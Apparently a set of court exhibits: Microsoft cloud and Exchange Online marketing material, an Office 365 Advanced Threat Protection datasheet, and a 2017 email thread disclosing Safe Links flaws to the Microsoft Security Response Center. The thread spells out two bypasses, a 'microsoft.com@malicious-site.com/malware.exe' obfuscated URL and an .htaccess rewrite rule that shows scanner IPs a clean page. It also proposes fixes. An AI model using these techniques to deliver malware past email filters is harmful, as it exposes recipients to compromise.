- Improve user productivity with self-service password reset and application access requests for directories in the datacenter and the cloud
- Provide secure remote access to on-premises web applications through Azure AD Application Proxy
- Take advantage of the high-availability and reliability of a worldwide, enterprise-grade, cloud-based identity and access management solution

## Identity-driven security


**Get identity-driven security**
Comprehensive, intelligent protection against today's advanced attacks

Microsoft Identity-Driven Security addresses the security challenges of today and tomorrow across users, devices, apps, data, and platforms. Each of your employees receive a single protected common identity for secure, risk-based conditional access to thousands of apps—on-premises and in the cloud. Innovative technologies safeguard your network at the front door.



Deep visibility into apps, devices, and data activity uncovers suspicious activities, user mistakes, and potential threats before they become real ones. And with behavioral analytics, machine learning, and unique Microsoft security intelligence, you can

secure your corporate files and data while freeing your employees to get their work done on the go.

Refer to: Identity-driven security

## Benefits

- Protect your organization at the front door with secure single sign-on, multi-factor authentication, and risk-based conditional access.
- Provide one common identity for accessing thousands of apps, and manage privileged identities and identity protection.
- Gain deeper visibility for your cloud apps and start controlling data with granular policies.
- Enable secure internal and external file sharing that lets you classify and label files at creation, track their usage, and protect them wherever they go.
- Help prevent data loss in iOS and Android devices with an unparalleled ability to manage Microsoft Office mobile apps.
- Identify advanced persistent threats by using behavioral analytics to detect suspicious user or entity behavior, both on-premises and in the cloud.
- Draw from vast Microsoft threat intelligence and security research data to detect anomalies and prevent threats right away

## Mobile device and application management



**Manage mobile devices + apps**
Securely manage apps and data on iOS, Android, and Windows from one place.

Leveraging Microsoft Intune, you can deliver application and device management completely from the cloud, or on-premises through integration with System Center Configuration Manager, all via a single management console.



Microsoft has also incorporated manageability and data protection directly into the Intune-managed Office mobile apps to help maximize productivity while providing the flexibility to extend these same management capabilities to your existing line-of-business apps through the Intune App Wrapping Tool. You can choose to manage the Office mobile apps with or without enrolling the device for management to protect

corporate information without the risk of intruding on a user's personal life.

Refer to: Mobile device and application management

## Benefits

- Deliver and manage apps across a broad range of devices, including iOS, Android, Windows and Windows Phone all from a single management console
- Simplify administration by deploying required apps automatically during enrollment and allowing users to easily install corporate apps from the self-service Company Portal
- Help maximize productivity with the Office mobile apps your employees know and love while preventing the leakage of company data by restricting actions such as copy/cut/paste/save in your managed app ecosystem, and extend these capabilities to existing line-of-business apps
- Deploy certificates, WiFi, VPN, and email profiles automatically once a device is enrolled, enabling users to seamlessly access corporate resources with the appropriate security configurations
- Provide comprehensive settings management for mobile devices, including remote actions such as passcode reset, device lock, and data encryption
- Remove corporate data and applications when a device is unenrolled, noncompliant, lost, stolen, or retired from use
- Extend your System Center Configuration Manager infrastructure through integration with Microsoft Intune to provide a consistent management experience across devices located on-premises and in the cloud

## Information security and data protection



**Protect your information**
Intelligently safeguard your corporate data and enable secured collaboration.

Microsoft Azure Information Protection helps you classify and label your data at the time of creation. Protection (encryption + authentication + use rights) can then be applied to sensitive data.



Classification labels and protection are persistent, traveling with the data so that it's identifiable and protected at all times –

regardless of where it's stored or with whom it's shared. The interface is simple and intuitive and does not interrupt your normal working experience. You also have deep visibility and control over shared data.

Refer to: Information security and data protection.

### Benefits

- Policies classify and label data at time of creation or modification based on source, context, and content. Classification with Azure Information Protection is fully automatic, driven by users, or based on recommendation.
- Embed classification and protection information for persistent protection that follows your data—ensuring it remains protected regardless of where it's stored or who it's shared with.
- Track activities on shared data and revoke access if necessary. Your IT team can use powerful logging and reporting to monitor, analyze, and reason over data.
- Share data safely with coworkers as well as your customers and partners. Define who can access data and what they can do with it—such as allowing to view and edit files but not print or forward.
- Data classification and protection controls are integrated into Microsoft Office and common applications to secure the data you're working on with one click. In-product notifications such as recommended classification help users make right decisions.
- Help protect your data whether it's stored in the cloud or in on-premises infrastructures. You have the flexibility to choose how your encryption keys are managed, including Bring Your Own Key (BYOK) options.

## Desktop virtualization



**Virtualize your desktops**
Efficiently deliver and manage Windows desktops and apps on all devices.

Workspace virtualization, whether through apps or full desktops, has been a trusted method to achieve these objectives. The key to your success is investing in a secure platform that will provide the necessary capabilities to serve varied use cases while allowing for flexibility and choice of deployment. Microsoft Remote Desktop Services (RDS) has been your trusted platform for delivering virtualized workspaces. Refer to: Desktop virtualization.

### Benefits

- Choose different deployment models to meet your needs: on-premises or in Azure
- Deliver Windows apps on any device: Windows, Mac, iOS, Android
- Scale up or down to meet dynamic business needs by delivering apps from the Azure cloud
- Provide a rich remote user experience similar to applications running on a local PC

- Maintain data compliance by keeping sensitive corporate resources off user devices

## Business Benefits

## Identity-driven security

**Safeguard your resources at the front door**. EMS calculates risk severity for every user and sign-in attempt, so risk-based conditional access rules can be applied to protect against suspicious logins.

**Protect your data against users mistakes**. Gain deeper visibility into user, device, and data activity on-premises and in the cloud to create more effective, granular level policies. Classify and label files at creation, track their usage, and change permissions when necessary.

**Detect attacks before they cause damage**. Identify attackers in your organization using innovative behavioral analytics and anomaly detection technologies – all driven by vast amounts of Microsoft threat intelligence and security research data.

## Managed mobile productivity

**Mobile apps without compromising your Office experience**. EMS is the only solution built with and for Microsoft Office. This means that email and other Office files can be secured without compromising the Office experience - the gold standard of productivity.

**Enable easy access to resources**. Sign in once for secure access to all corporate resources, on-premises and in the cloud, from any device. This includes pre-integrated support for Office365, Salesforce.com, Box, ServiceNow and thousands more popular SaaS apps.

**Enable users to protect and control data**. Employees can encrypt virtually any type of file, set granular permissions, and track usage. The encryption stays with the file where it goes, enabling more secure file sharing, internally and externally.

## Flexible + Comprehensive

**Work with what you have**. Get an integrated set of solutions that are designed to work together with your on-premises investments, avoiding the need for costly and complicated integration efforts across point capabilities.

**Future-proof your investment**. As a cloud solution that integrates with your on-premises infrastructure, EMS takes the worry out of scale, maintenance, and updates.

**Simplify your set-up**. To make deployment even easier, EMS comes with FastTrack - a Microsoft service that includes best practices, tools, resources, and experts committed to make your experience with EMS a success.

**Get more for less**. Our complete solution can cost less than combining standalone products from other vendors.

## Products



1. **Azure Active Directory Premium** delivers multi-factor authentication; access control based on device health, user

location; and, holistic security reports, audits, and alerts. Refer to: Azure Active Directory

2. **Microsoft Advanced Threat Analytics** helps extend the visibility, auditing, and control you have on-premises to your cloud applications. Refer to: Microsoft Advanced Threat Analytics

3. **Azure Information Protection** provides persistent data protection of files shared internally and externally, including the option to track, classify and label data. Refer to: Azure Information Protection.

4. **Microsoft Cloud App Security** provides deep visibility and control of data inside cloud applications. Refer to: Cloud App Security

5. **Microsoft Intune** makes it easier to secure and manage iOS, Android, and Windows PCs all from one console. Deep integration with Office 365 helps keep company data secure in the Office mobile apps. Refer to: Microsoft Intune

# MICROSOFT'S ENTERPRISE CLOUD ROADMAP

Microsoft is using Microsoft Azure, Office 365 and Microsoft Dynamics to deliver the industry's most complete cloud — for every business, every industry, and every geography.

## Cloud Services and Platform Options

### Microsoft SaaS Services



Taking advantage of productivity workloads provided in the cloud is a first step for many enterprise organizations.

- Get started quickly.
- Rich feature set is always up to date.
- Frees organizations to focus IT resources on strategic applications.
- Includes a Microsoft Azure Active Directory tenant for use with other Microsoft cloud services.

| Office 365 |
|---|
| Enterprise cloud productivity and collaboration services |
| OneDrive for Business |
| File storage and synchronization for enterprises |
| Yammer |
| Enterprise cloud social networking |
| Microsoft Dynamics CRM |
| Enterprise cloud customer relationship management |
| Azure Active Directory |
| Provides an identity and access management solution: directory services, identity governance, security, and application access management. |
| Microsoft Intune |
| Enterprise cloud PC and mobile device management |
| Azure Multi-Factor Authentication |
| Used with Azure Active Directory, it allows you to safeguard access to data and applications while employing a simple sign-in process. |

**Best for**

All productivity workloads:

- Organization-wide email
- Instant messaging, video conferencing
- Sharing organization data, team sites, project sites

- Secure cloud-storage for business documents
- Desktop and cloud-based applications that are always up to date

Enterprise-wide, private social networking:

- Share information across teams & projects
- Connect to the right people

Manage mobile devices, PCs, and applications from the cloud

Manage customer relationships, including sales, service, and marketing.

## Microsoft Azure PaaS



Use the Azure PaaS open and flexible platform to quickly build, deploy, and manage cloud-enabled applications across the global network of datacenters managed by Microsoft.

- Build modern applications and focus on functionality instead of infrastructure.
- Build applications that are not possible on-premises.
- Support for many programming languages including .Net, Java, PHP, Ruby, Node.js, Python, and more.
- Choice of frameworks including .Net, ExpressJS, Rails, Zend, and more.

Microsoft Azure PaaS is a growing collection of integrated services—compute, storage, data, app, and networking—that helps you move faster, do more, and save money.

| Azure Web Apps |
|---|
| Build websites with .Net, PHP, Python, Java, or Node.js and deploy in seconds. |
| Azure Storage |
| Massively scale storage in different types. Manage SQL databases as a service. Secure and dedicated Redis cache. |
| Azure Compute |
| Quickly deploy and manage multi-tier apps. Achieve continuous availability. |
| Azure Media Services |
| Encode, store, and stream video and audio at scale. Deliver content globally. |
| Azure Mobile Services |
| Create highly functional mobile apps that can access backend capabilities. |
| Azure Stream Analytics |

Perform real-time stream processing in the cloud for Internet of Things solutions. Create dashboards and alerts.

**Azure Logic Apps**

Develop powerful integration solutions with SaaS and enterprise applications.

**Azure API Apps**

Expose and your application its APIs to your SaaS and enterprise applications.

**Best for**

- Mobile applications
- Hybrid cloud storage with StorSimple
- Media streaming, Video archiving
- Big data solutions using HD Insights
- Machine learning and other advanced analytics scenarios
- B2B e-commerce, E-commerce website
- Scalable web portals and sites
- Multichannel marketing
- Gaming apps
- Internet of Things (IoT) solutions

## Microsoft Azure IaaS



Extend your IT infrastructure to the cloud by using Azure compute, storage, and networking features and resources.

- Combine Azure IaaS with Azure PaaS features as you move existing workloads to the cloud.
- Create, resize, and decommission virtual machines in minutes for dev and test scenarios.
- Reduce your on-premises servers and your overall datacenter costs.
- Plan, size, and scale your infrastructure to support your long-term cloud adoption plans.

Microsoft Azure IaaS includes network services and virtual machines. These services can be combined with any PaaS services. Manage your environment using the Azure portal, Azure PowerShell, or the Azure Command Line Interface (CLI).

**Virtual Network**

Provision and manage virtual networks in Azure and securely link to your on-premises IT infrastructure.

**ExpressRoute**

Connects on-premises infrastructure directly to the Microsoft network that contains Azure datacenters, without using the Internet.

**Virtual Machines**

Create new virtual machines or create and upload your own to create pre-configured virtual machines.

**Traffic Manager**

Load balance incoming global traffic across multiple services running in the same or different datacenters.

**Best for**

- Development and test environments
- Disaster recovery of on-premises solutions
- Big data solutions using HDInsight
- SAP solutions
- SQL Server test, backup, and disaster recovery
- Datacenter expansion or replacement

## Private cloud



Private cloud datacenters excel at hosting services that remain on-premises to support hybrid cloud solutions. Organizations that excel with private cloud IaaS capabilities can benefit from taking this approach with a broader portfolio.

- Combines Windows Server, System Center, and other Microsoft technologies to provide a private IaaS environment.
- Provides the benefits of IaaS but on your terms with dedicated resources, complete control, greater potential for customization, and greater datacenter efficiency.

**Windows Server** delivers an enterprise-class, multi-tenant datacenter and cloud infrastructure.

**Generation 2 Virtual Machines**

Advanced virtual machine features.

**Hyper-V Replica**

Provides asynchronous replication of Hyper-V virtual machines between two hosting servers.

**Live Migration**

Move a running virtual machine from one physical server to another without interruption of service.

**System Center** delivers Unified management across on-premises, service provider, and Microsoft Azure environments.

**Virtual Machine Manager (VMM)**

Configure and manage virtualization hosts, networking, and storage resources for private clouds.

**App Controller & Service Manager**

| | |
|---|---|
| Provide application self-service — Delegate authority to users to create applications and cloud environments. | |
| **Configuration Manager** | |
| Manage PCs & servers, setting configuration and ensuring compliance with security policies. | |

**Best for**

- Running core network services to support hybrid cloud environments:
- Compliance with data sovereignty, privacy, and regulatory requirements
- Legacy applications
- Implementing a chargeback process based on consumption for business units in your organization
- Providing delegated authority and tools to implement a self-service model
- Constructing and spanning cloud environments across multiple datacenters, infrastructure, and service providers

## Balance of Responsibilities



The balance of control and responsibility for managing solutions depends on the category of the service. The above chart summarizes the balance of responsibility for both Microsoft and the customer.

## Resources

- Microsoft Cloud Services and Platform Options

# Microsoft IT moves its workloads to the cloud

Modernization and efficiency demands are driving Microsoft IT to a "cloud first" strategy.

- Two datacenters are closing in the near future, leases on others will expire.
- Thousands of servers are reaching end of life (EOL), with replacement requiring $200 million over the next five years.

## Three-Phase Approach

1. **Productivity workloads move to SaaS**. Microsoft IT moved quickly to take advantage of Microsoft SaaS offerings with employees using Office 365, Yammer, and OneDrive. Microsoft also uses Dynamics CRM Online.
2. **New development and modern applications move to PaaS**. New applications are optimized for cloud computing. Focus is on functionality rather than infrastructure.
3. **Existing applications move to IaaS**. Existing applications are moved to IaaS virtual machines using one of two approaches:
   - Lift and shift. Existing virtual machines are shifted to the cloud.
   - Build in the cloud. Applications are prebuilt in Azure and traditional methods are used to back up and restore data.



# Microsoft cloud storage options

The Microsoft Cloud Storage for Enterprise Architects document covers what IT architects need to know about storage options in Microsoft cloud services and platforms along with the reasons for using cloud storage and the key scenarios.

- **Move-in ready** cloud storage options that are bundled with existing services, which you can use immediately and with minimal configuration.
- **Some assembly required** storage options that you can use as a starting point for your storage solution with additional configuration or coding for a custom fit.
- **Build it from the ground up** with storage building blocks to create your own storage solution or storage for your apps from scratch.

Case 0:20-cv-60416-AMC   Document 3-15   Entered on FLSD Docket 02/26/2020   Page 289 of 726

# EXHIBIT 13



Case 1:20-cv-60416-XXXX  Document 3-15  Entered on FLSD Docket 02/26/2020  Page 2 of 3

# Office 365
# Advanced Threat Protection

## The Challenge

As hackers around the globe launch increasingly sophisticated attacks, organizations are seeking tools that provide additional protection. Microsoft is pleased to offer customers security capabilities in Microsoft Office 365 with Advanced Threat Protection (ATP), an email filtering service that provides stronger protection against specific types of advanced threats.

## The Microsoft Approach

Office 365 ATP offers three core features to better secure your email:

1. Safe Attachments, which protects against unknown malware and viruses
2. Safe Links, which provides real-time, time-of-click protection against malicious URLs
3. Rich reporting and trace capabilities

## Safe Attachments

Safe Attachments is designed to detect malicious attachments before anti-virus signatures are available, and to provide better zero-day protection to safeguard your messaging system. All messages and attachments without a known virus/malware signature are routed to a special hypervisor environment, where a behavioral analysis is performed using a variety of machine-learning and analysis techniques to detect malicious intent. Safe Attachments then detonates attachments that are common carriers of malicious content, such as Office documents, PDFs, executable (EXE) files, and Flash files. If no suspicious activity is detected, the attachment is released for delivery to the mailbox.

## Safe Links

Safe Links is a feature that helps prevent users from going to malicious websites when they click them in email. Attackers sometimes try to hide malicious URLs within seemingly safe links, redirecting users to unsafe sites through a forwarding service after the message has been received. The ATP Safe Links feature proactively protects your users if they click such a link. That protection remains every time they click the link, so malicious links are dynamically blocked while good links remain accessible.

Case 0:20-cv-60416-XXXX   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 291 of 726

# Dynamic delivery of Safe Attachments

Dynamic Delivery eliminates email delays by sending the body of the email with a placeholder attachment, while the actual, suspicious attachment undergoes the Safe Attachments scan. Recipients can then read and respond to the message, having been notified that the original attachment is being analyzed. If the attachment is cleared, it replaces the placeholder; if not, the admin can filter out the unwanted and potentially malicious attachment.

# URL Detonation

URL Detonation provides deeper protection against malicious URLs. Not only does ATP check a list of malicious URLs when a user clicks on a link, but Office 365 ATP will also perform real-time behavioral malware analysis in a sandbox environment against malicious attachments at destination URLs. For example, if an email includes a link to a Word document on a web server, the document is downloaded into our sandbox environment and detonated as if it were an attachment.

# Rich reporting

Safe Attachments has two traffic reports which show aggregated data for a tenant by disposition (blocked, replaced etc.) and the file types. The report also shows detailed data (i.e. date, sender, recipient, ID, subject). Safe Links has advanced reporting features that make it easy to determine who has clicked through a malicious link to support faster remediation. The rich reporting URL trace capabilities provide critical insights into who is getting targeted in the organization and the category of attacks being faced. Reporting and message tracing enable investigation of messages that have been blocked due to unknown viruses or malware, while the URL trace capability enables tracking of individual malicious links in the messages that have been clicked. Addtionally, ATP reporting will expand to provide analysis on why ATP flagged an email as a threat, identifiying threats caught by ATP which would have been missed without ATP (identifiying advanced threats specificially), and granular details on scan times for emails with attachments.  ATP reporting, will ultimately enable proactive email protection.

To learn more, visit
https://products.office.com/en-us/exchange/online-email-threat-protection

To add advanced threat protection to your subscription or learn more, contact <partner name and contact info>.





# EXHIBIT 14



# Why Email?
Email is on the rise and the preferred platform for millennials

## Email
### the backbone of business communications



**Work colleague communication preferences[±]**

**Millennials "obsessed" with work email[±]**
- 81% check when on vacation and before work
    - more than any other age group
- 68% strive for a zero-inbox vs 55% overall.

## Email
### core to the modern workplace & Office 365

**#1**  In businesses, email continues to hold the top spot among workplace communication tools with 99% usage[*]

**3.8B**  More than half the world's population uses email today[**]

**99%**  Of us check email every day[1]

**98% of Fortune 500 companies** have Office 365.

Data as of October 2018

\* Source: Spiceworks study of 900 IT Professions
\*\* Source: Lifewire, December 2018
± Source: Adobe blog, Aug 2018 and Forbes, Aug 2017
[1] Source: DMA Insights Tracker

Case 0:20-cv-60416-XXXX   Document 3-16   Entered on FLSD Docket 02/26/2020   Page 295 of 726

# Microsoft Exchange Online
## Built on 23 Years of Market Leading Innovation

**Exchange Online**

 **Most secure**

99.9% uptime guarantee, unparalleled compliance standards, advanced data, threat and identity protection

 **Most productive**

Enables full collaboration experience with SharePoint, Teams, and Outlook, faster search, seamless mobile experience, intelligent calendaring, 100GB mailboxes and unlimited archives

 **Lowest TCO**

No more migrations, no more patching, lower cost per user, FastTrack migration services, reduced IT overhead, seamless hybrid means cloud at your pace

| | | | | | |
|---|---|---|---|---|---|
| Outlook Anywhere | PowerShell | Clustering | Hybrid Deployment | Database Availability Groups | ActiveSync |
| **Exchange 2013** | Outlook Web Access (OWA) | **Exchange 2016** | Data Loss Prevention | Hybrid Modern Auth | **Exchange 2003** |
| Mobile email | Archive mailboxes | **Exchange 4.0** | Outlook mobile iOS/Android | **Exchange 5.5** | MetaCache Database |
| Unified Messaging | Continuous Replication | Preferred Architecture | SMTP | **Exchange 2019** | **Exchange 2000** | Large mailboxes |
| Active Directory | **Exchange 2007** | **Exchange 2010** | eDiscovery | Modern Attachments | **Exchange 5.0** |

*Office 365 Service Level Agreement          **Exchange Online Storage

Case 0:20-cv-00416-XXXX   Document 3-16   Entered on FLSD Docket 02/26/2020   Page 5 of 9

Exchange Online  >  Most Secure  >  [Secure data protection](#)

# We protect: data access, server data, sensitive data

| Service | Server | End User |
|---|---|---|





**Lockbox system**

**Privileged Access**

### We protect data access
Access to your data
independently audited

### We protect server data
Multiple copies
multiple datacenters
encrypted data
deleted item protection

### We protect sensitive data
Configure data-loss prevention policies
warn users of policy violation
internal and external

Some features in this deck are premium features and may require additional licensing. Click <u>here</u> for the latest information.

Exchange Online > Most Secure > **Advanced Threat Protection**

# Detect issues before they happen

### Safe Attachments



### Safe Links



### URL Detonation & Dynamic Delivery



**Defend against malicious documents**
with ATP Safe Attachments

**Ensure document hyperlinks are harmless** with ATP Safe Links

**Neutralize spear-phishing tactics**
with ATP URL Detonation and Dynamic Delivery

Some features in this deck are premium features and may require additional licensing. Click here for the latest information.

Case 0:20-cv-60416-XXXX   Document 3-16   Entered on FLSD Docket 02/26/2020   Page 7 of 9

# Productivity in Microsoft 365

## Inner Loop
People you work with regularly on core projects

Examples:
Team meetings & communication
Event planning
Sales Team planning

Content collaboration
**SharePoint**

Video & live events
**Stream**

Email and Calendar
**Exchange**

Teams

Yammer

Outlook

## Outer Loop
People you connect with openly across the organization

Examples:
Corporate communications
CEO Town Hall Meetings
Employee Interest Groups







## Email
Pervasive availability. Targeted communications.

Case 0:20-cv-60416-XXXX   Document 3-16   Entered on FLSD Docket 02/26/2020   Page 3 of 9

# Focused Inbox

**Stay on top of incoming email** without having to visit another folder

**Prioritize your actions** based on email from the people you interact with often, and the content of the email itself

Focus on the emails that **matter most to you**



# Search

**Search email up to 66% faster** than with prior versions of Outlook

Find the right person fast with **fuzzy name matching**

**Put a face to a name** with pictures from the company directory



Case 0:20-cv-60416-XXXX   Document 3-16   Entered on FLSD Docket 02/26/2020   Page 9 of 9

# Top 10 reasons to deploy Exchange Online today!

## Get work done faster

Users can do their best work using intelligent features to get work done smarter and faster

## 99.9% uptime guarantee

With a 99.9% financially backed uptime guarantee, your business can rely on us

## Meet compliance obligations

Meet regulatory, data privacy, and compliance requirements

## Protect your data

Data loss prevention, data and server redundancy, secure operational processes and encryption

## Protect identities

Control access to valuable resources using cloud-based intelligence

## Manage where data is stored

Control where each employee's Exchange data is stored at-rest

## Save time and money

No need for patches, updates, and maintenance with Microsoft delivered security updates

## Protect against threats

The most trusted and secure way to protect against cyber threats

Some features in this deck are premium features and may require additional licensing. Click here for the latest information.

*Office 365 Service Level Agreement

Case 0:20-cv-60416-AMC   Document 3-17 Entered on FLSD Docket 02/26/2020 Page 301 of

# EXHIBIT 15

23/08/2020 Case 0:20-cv-60416-XXXX Document 1-1 Entered on FLSD Docket 02/26/2020 Page 2 of 4
Gmail - RE: Exchange Online Advanced Threat Protection TRK:0901003101

Case 0:20-cv-60416-XXXX Document 1-1 Entered on FLSD Docket 02/26/2020 Page 302 of 726

![Gmail logo](by Google)

Mikail Tunç <mikail@emtunc.org>

## RE: Exchange Online Advanced Threat Protection TRK:0901003101
12 messages

**Microsoft Security Response Center** <secure@microsoft.com>
To: Microsoft Security Response Center <secure@microsoft.com>, "mikail@emtunc.org" <mikail@emtunc.org>

Hello,

Thank you for contacting the Microsoft Security Response Center (MSRC). In order to investigate your report and determine its eligibility, I will need a valid proof of

For more information on what qualifies as a security vulnerability please see the following:

"Definition of a Security Vulnerability"
<https://technet.microsoft.com/library/cc751383.aspx>

Regards,

Katie
MSRC

------------------ Original Message ------------------
**From:** mikail@emtunc.org
**Received:** 1/14/2017 5:41 AM
**To:** <Microsoft Security Response Center>; Microsoft Security Response Center; Microsoft Security Response Center
**Subject:** Exchange Online Advanced Threat Protection

Hello,
I would like to e-mail someone directly with regards to a bug/vulnerability/security issue with regards to Safe Links in Exchange Online (Office 365).

Please let me know the best person to speak to - I'll be blogging my findings in the next few days if I don't receive a response.

--
**Mikail Tunç**
m: 07766889409
w: https://emtunc.org e: mikail@emtunc.org



**Mikail Tunç** <mikail@emtunc.org>
To: Microsoft Security Response Center <secure@microsoft.com>

15 January 2017 at 13:14

Hello Katie,
Thanks for your swift response.

Okay so the vulnerability and bug (I believe both exists here) relates to the Exchange Online - Advanced Threat Protection - **Safe Links** feature.

From what I understand, the Safe Links feature should be following URL's and re-directs to see if downloadable/executable content lives on the other side. Please correct me if my understanding is incorrect.

I have attached a .csv with a compilation of 'suspicious/dangerous' attachments. Out of those 58 extensions, only 10 appeared to be scanned by EOP. I came to this conclusion by monitoring my apache access logs. The extensions marked 'Y' in the .csv are the ones where a request arrived from EOP to download the attachment and probably execute in a sandbox. EOP did not make any requests for any of the other file extensions - even after clicking the URL's.

Is this expected behaviour? Surely not... if it is then the Safe Links feature is trivially bypassed by providing a .html link with a simple redirect to an executable.

Also I read some documentation on Safe Links and I'm pretty sure it said PowerShell scripts were also run in the sandboxed environment - if that is the case, why did I not see any EOP requests in my access logs for the .ps* file extensions?

Second, the Safe Links feature fails to scan some basic obfuscated URL's.
Take the following scenario:

- Big Corp (let's say Microsoft.com as an example) has ATP enabled with Safe Attachments and Links configured
- Big Corp doesn't want their own URL's scanned because, you know, they trust their own domains and IT doesn't want to harm user experience by having their own domain scanned for 10,000's of users every time an internal document is passed around
- Big Corp adds Microsoft.com to the white-list
- Bad guy simply obfuscates malicious attachment and passes completely through the filters by using the following technique:
  http://microsoft.com@bad-guys-domain-here.tld/malware.exe

That URL will completely bypass ATP URL-rewriting process. This will probably be an easy one to fix by updating the regex used to determine white-listed domains.

My last and final find is another trivial bypass to Safe Links... this one is more difficult to fix but consider this scenario:

NOTE: Bad guy doesn't even need to use this bypass if my first point at the top of this e-mail is intentional behaviour (i.e., ATP doesn't follow links/redirects such as .html)

- Bad guy finds the public list of EOP IP addresses
- Bad guy creates a .htaccess rule to rewrite all requests from EOP IP ranges to something inconspicuous like:
  RewriteRule .* nothing-here.html [L]
- ATP will see that there is nothing malicious here and allow the user to continue on to the real, malicious URL

The only real ways that I can see to fix this bypass is to:

- Expand the IP ranges you use for ATP and do NOT make them public - administrator's don't need to see these IP's as YOUR servers are doing the 'GET' requests
- Spoof and/or use real headers - you are currently not sending through ANY headers which makes it trivial to me to block your requests. Use real browser headers to make it difficult/impossible to determine which requests are coming from Microsoft and which requests are coming from users

If you do the above then it would be very difficult for a bad-guy to determine which requests are coming from Microsoft ATP servers - making it difficult to block/redirect ATP requests to a harmless looking file while passing through user traffic to malicious files.

Hope that all makes sense. Let me know if you need any clarifications and please let me know what you plan to do about the above any/or any timelines so I know when I can write about it on my blog.

Mikail
+447766889409

• 

[Quoted text hidden]
[Quoted text hidden]



📄 **Scanned Extensions.csv**
    3K

---

**Mikail Tunç** <mikail@emtunc.org>                                                      20 January 2017 at 09:37
To: Microsoft Security Response Center <secure@microsoft.com>

Hello MSRC,
Do you have any update on this? Also would you be so kind as to let me know if any of the above would be eligible for the Office 365 Online Service bug bounty? I suspect I would be eligible as I have shown white-list bypassing using the URL obfuscation technique?

Thank you,
Mikail
[Quoted text hidden]

---

**Mikail Tunç** <mikail@emtunc.org>                                                       1 February 2017 at 14:22
To: Microsoft Security Response Center <secure@microsoft.com>

Hello MSRC,
Any updates for this report? I have heard nothing in > 15 days.

Thanks,
Mikail
+447766889409
[Quoted text hidden]

---

**Microsoft Security Response Center** <secure@microsoft.com>                             7 February 2017 at 02:12
To: Microsoft Security Response Center <secure@microsoft.com>, "mikail@emtunc.org" <mikail@emtunc.org>

Hello,

Apologies for the delay in response time - a bug on our end caused this reply to be missed.

From how I am interpreting your report, it sounds like what you are describing is the potential set up to a vulnerability, but the attack angle is unclear. Additionally, it would require a malformed file to be downloaded from an untrusted source.

Can you clarify how an attacker could user this information to exploit another user remotely? We greatly appreciate your time on this.

[Quoted text hidden]

---

**Mikail Tunç** <mikail@emtunc.org>                                                       7 February 2017 at 09:59
To: Microsoft Security Response Center <secure@microsoft.com>

Hello Katie,
Let's take the domain Microsoft.com as an example - let's say microsoft.com has ATP safe links enabled. Microsoft.com has the domain Microsoft.com as a white-list domain in the safe links policy settings.

So I, as a bad guy, send you a link to malicious-site.com/malware.exe - this will be re-written by safe-links; threat blocked, everything is good.

However by using a URL obfuscation technique, an attacker can completely bypass URL re-writing by ATP.
Take this example: http://microsoft.com@malicious-site.com/malware.exe - this will take a user *directly* to the malware domain completely bypassing the safe links feature by abusing the domain white-listing settings.

The fix for this should be fairly straight forward - evaluate the entire URL - take in to account URL obfuscation techniques, base64 encodings and any other funny URL obfuscation tricks that attackers may use.

My other concerns were around your scripts/bots that execute/follow the URL in an e-mail. There are no HTTP headers sent with the requests and the IP's that the requests come from are publicly available and predictable so it is very easy to use redirect-rules to redirect EOP/ATP requests to a clean page and everything else to a malicious link.

One way to make it harder for attackers to exploit this weakness is to:

- Expand the IP ranges you use for ATP and do NOT make them public - administrator's don't need to see these ranges as ATP sandbox servers are doing the 'GET' requests
- Spoof and/or use real headers in the requests - you are currently not sending through ANY headers (blank) which makes it easy for me to block/re-direct ATP requests simply based on blank headers. Use real browser headers to make it difficult/impossible to determine which requests are coming from EOP/ATP and which requests are coming from users

I apologize if any of the above is unclear - I am happy to clarify anything over the phone if you prefer. +44 77 66 88 9409

Mikail

Thanks,
Mikail

[Quoted text hidden]
[Quoted text hidden]



---

**Mikail Tunç** <mikail@emtunc.org>                                                      15 February 2017 at 23:26
To: Microsoft Security Response Center <secure@microsoft.com>

Hello MSRC,
Please confirm whether you acknowledge this vulnerability or not and whether it is eligible for the Exchange Online/365 bug bounty.

Thank you,
Mikail
[Quoted text hidden]

---

**Mikail Tunç** <mikail@emtunc.org>                                      23 February 2017 at 15:42
To: Microsoft Security Response Center <secure@microsoft.com>

Hello, This is my last reply to this e-mail chain.
I am notifying you that I am publishing my findings on the 27th Feb.

Thanks,
Mikail
[Quoted text hidden]

---

**Microsoft Security Response Center** <secure@microsoft.com>            24 February 2017 at 23:06
To: Microsoft Security Response Center <secure@microsoft.com>, "mikail@emtunc.org" <mikail@emtunc.org>

Hello Mikail,

Apologies for the delay in servicing this report. As stated, we have opened a new MSRC case 37595 for this finding and submitted your report for review by our bounty team.

Unfortunately, we need time to review this case. Would you be willing to delay your public post? As a reminder: if you go public before a potential patch could be pushed, you could be removed from future bounty rewards.

We appreciate your time on this, as well as your due diligence in following up.
[Quoted text hidden]

---

**Mikail Tunç** <mikail@emtunc.org>                                      24 February 2017 at 23:44
To: Microsoft Security Response Center <secure@microsoft.com>

Katie,
I am wiling to delay my public post but please respond in a timely manner - it's not asking much.

Thanks,
Mikail
[Quoted text hidden]
[Quoted text hidden]


---

**Microsoft Security Response Center** <secure@microsoft.com>            25 February 2017 at 02:45
To: Microsoft Security Response Center <secure@microsoft.com>, "mikail@emtunc.org" <mikail@emtunc.org>

Hi Mikail,

Just a quick introduction,  I'm Will and will be taking over for Katie and will be your point of contact moving forward.

First of all thanks for reporting this to Microsoft responsibly, we appreciate your effort in doing so. Our product team is investigating your report and I hope to have some feedback soon. While that is completing if you have any question or more information please don't hesitate to contact me by replying to this email. We also appreciate your willingness to delay your blog posting that you have reported through the Microsoft Bounty Program.

I look forward to working with you and feel free to ping me with any questions or concerns.

Regards,
Will
[Quoted text hidden]

---

**Mikail Tunç** <mikail@emtunc.org>                                      28 February 2017 at 13:01
To: Microsoft Security Response Center <secure@microsoft.com>

Thanks for the reply Will.
Please let me know what the team come back with.
Also happy to provide any further clarifications if required.
Thanks,
Mikail
[Quoted text hidden]
[Quoted text hidden]

Case 0:20-cv-60416-XXXX   Document 3-18   Entered on FLSD Docket 02/26/2020   Page 1 of 4

# EXHIBIT 16

Microsoft

☼

≡ Contents

# Definition of a Security Vulnerability

7 minutes to read

What's a security vulnerability? Most people think this would be an easy question to answer, but in fact it turns out not to be. This article discusses the definition used by the Microsoft Security Response Center (MSRC) to categorize the variety of issues we examine every day.

